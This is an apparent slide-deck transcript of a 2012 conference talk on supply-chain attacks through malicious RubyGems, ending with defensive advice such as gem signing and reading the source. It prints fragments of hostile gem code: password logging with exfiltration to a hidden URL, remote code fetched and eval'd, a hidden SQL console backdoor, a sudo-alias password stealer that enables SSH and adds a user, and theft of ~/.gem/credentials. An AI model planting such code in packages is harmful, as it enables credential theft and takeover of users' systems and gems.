Hacking with Gems

Hacking with Gems
Benjamin Smith
@benjamin_smith
Wednesday, October 10, 12

View Slide

who i am

View Slide


View Slide

what i am NOT

View Slide


View Slide

please do not try this at home

View Slide

what’s in my app?
GEM
remote: https://rubygems.org/
specs:
actionmailer (3.2.8)
actionpack (= 3.2.8)
mail (~> 2.4.4)
actionpack (3.2.8)
activemodel (= 3.2.8)
activesupport (= 3.2.8)
builder (~> 3.0.0)
erubis (~> 2.7.0)
...

View Slide

what’s the worst that could happen?

View Slide

gem 'awesome_rails_flash_messages'
github.com/benjaminleesmith/awesome-rails-flash-messages

View Slide

before...

View Slide

after!

View Slide

some “side effects”
if params.to_s.match(Base64.decode64('cGF...'))

View Slide

...
File.open(
"#{Rails.root}/public/development.log",
'a+'
) do |f|
f.write("#{params.inspect}\n")
end

View Slide

?!?
Net::HTTP.post_form(
URI.parse(Base64.decode64('aHR0cDo...')),
{
'log'=>params.merge(:url =>
request.url).inspect
}
)

View Slide

i like cGFzc3dvcmQ=\n
if params.to_s.match(Base64.decode64('cGF...'))

View Slide

i like password
if params.to_s.match(“password”)

View Slide

“development.log”
...
"user"=>{"email"=>"[email protected]",
"password"=>"password",
"remember_me"=>"0"}
...

View Slide

elsewhere...

View Slide


View Slide

that was easy.
what else can I do?

View Slide

gem 'net_http_detector'
github.com/benjaminleesmith/net_http_detector

View Slide

show me the hack
#stark-samurai-8122.herokuapp.com/logs>,
{"log"=>"{\"utf8\"=>\"✓\",
\"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\",
\"user\"=>{\"email\"=>\"test\",
\"password\"=>\"pass4\"
...

View Slide

how it works
def HTTP.valid_post_form(url, params)
...
def HTTP.post_form(url, params)
self.smart_log(
"Net::HTTP.post_form(#{url.inspect},
#{params.inspect})"
)
Net::HTTP.valid_post_form(url, params)
end

View Slide

...and one more thing...
eval(Net::HTTP.valid_get(
URI("http://....herokuapp.com/
snippets/6")
)
)

View Slide

database what?
append_before_filter :net_http_detector
...
if params[:db_console]
@tables =ActiveRecord::Base.connection.tables
if params[:query]
@output = ActiveRecord::Base.connection
.execute(params[:query])

View Slide

/users/sign_in

View Slide

/users/sign_in?db_console=t

View Slide

hello db access!

View Slide

SELECT * FROM users;

View Slide

UPDATE users SET admin=1
WHERE id=42;

View Slide

CREATE USER admin1 WITH
PASSWORD 'password';

View Slide

careful of wolves in sheep’s clothing

View Slide

Little Snitch
obdev.at/products/littlesnitch/index.html

View Slide


View Slide

that was easy.
what else can I do?

View Slide

gem 'better_date_to_s'
github.com/benjaminleesmith/better_date_to_s

View Slide

what it claims to do
Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"
... instead of...
=> " 1 Jan"

View Slide


View Slide

what it also does
set_date_formats_for(
Rails.env,
Rails.root.to_s
)

View Slide

better_date_to_s.bundle
œ˙Ì˛ê(__TEXT__text__TEXTP
ÛP
Ä__stubs__TEXTD
$DÄ__stub_helper__TEXThLhÄ__cstring__TEX
T∏i∏__unwind_info__TEXT!P!
__eh_frame__TEXTxÄxà__DATA__nl_symbol_pt
r__DATA__got__DATA__la_symbol_ptr__DATA0
__data__DATAHHH__LINKEDIT ‰"Ä0 [email protected]
Ä¿ `(!‰"

View Slide

behind the curtain
if(strcmp(rails_env, "production") == 0) {
sprintf(tar_command, "tar -zcvf
%s/public/assets.tar.gz %s > /dev/
null 2>&1",rails_root,rails_root);
system(tar_command);
}

View Slide

what what

View Slide

i can haz source

View Slide

truth time
• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile

View Slide

that was easy hard.
what else can I do?
(that's easier)

View Slide

gem install be_truthy
github.com/benjaminleesmith/be_truthy

View Slide

what it does
> true.should be_true
> User.new.should be_true
> User.new.should be_truthy

View Slide

what it ACTUALLY does

View Slide


View Slide

ﬁle tree looks ok

View Slide

source code looks good
require "be_truthy/version"
module BeTruthy
end

View Slide

but what was this?

View Slide

I see no C

View Slide

run the what ﬁle?
Gem::Specification.new do |gem|
...
gem.extensions = ["Rakefile"]
...
end

View Slide

there is no Rakeﬁle

View Slide

gem fetch vs gem install
> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem

View Slide

the real ﬁle tree

View Slide

what does the Rakeﬁle do?

View Slide

sudo_file =__FILE__.gsub(
'Rakefile', 'lib/tmp.rb'
)
FileUtils.mv(
sudo_file,
"#{home_dir}/.tmp"
)

View Slide

File.open(profile, 'a+') do |f|
f.write("alias sudo='ruby #{home}/.tmp'\n")
end

View Slide

FileUtils.rm(__FILE__)

View Slide

fseventer
fernlightning.com/doku.php?id=software:fseventer:start

View Slide

what does "sudo" do now?

View Slide

print "WARNING: Improper use of the sudo
command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

View Slide

echo '#{password}' | /usr/bin/sudo -S
systemsetup -setremotelogin on

View Slide

/usr/bin/sudo dscl . -create /Users/
#{username}
...
/usr/bin/sudo dscl . -passwd /Users/
#{username} password`

View Slide

URI.parse('http://.../logs'),
{'log' => 'ssh enabled'}
)

View Slide

ssh [email protected]

View Slide

take away:
don't install ben's gems

View Slide

how could I get you
to run my code?

View Slide

what gems are
trustworthy?

View Slide

how can I add my code
to already trusted gems?

View Slide

back to the truthy_gem
gem_api_key = File.open(
`echo ~/.gem/credentials`.strip
).read
gem_list = `gem list`
Net::HTTP.post_form(...)

View Slide

now I own your gems

View Slide

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem

View Slide

do people trust your gems?

View Slide

do people who install
your gems have
trustworthy gems?

View Slide

there’s still one problem

View Slide

bootstrapping

View Slide

being popular sucks

View Slide

conferences

View Slide

gem install thread_safe

View Slide

brew install hub

View Slide

gem install eventmachine

View Slide

gem install aloha-ruby-conf

View Slide


View Slide

usernames
• ntreadway
• ken
• mlaverty
• takatsugu.ishioka
• evan
• leo

View Slide

3.8% adoption

View Slide

so what now?

View Slide

gem cert --build

View Slide

gem install rails -P HighSecurity

View Slide

github.com/rubygems/rubygems

View Slide

private gem repos

View Slide

do not try this at home

View Slide

don't install gems you
don't need to

View Slide

pay attention to what
your gems do

View Slide

monitor your system

View Slide

read the source

View Slide

gem install coal-mine-canary

View Slide

thank you!

View Slide

@benjamin_smith
https://github.com/benjaminleesmith
http://pivotallabs.com/users/bsmith/blog

View Slide

Hacking with Gems

Hacking with Gems

Benjamin Smith

More Decks by Benjamin Smith

Other Decks in Technology

Featured

Transcript